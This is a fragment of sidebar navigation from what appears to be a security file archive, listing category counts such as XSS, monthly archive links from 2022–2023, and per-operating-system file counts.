*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,857)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,993)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,793)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,229)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,590)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,754)
*   UNIX (9,267)
*   UnixWare (186)
*   Windows (6,565)
*   Other

Tag

#google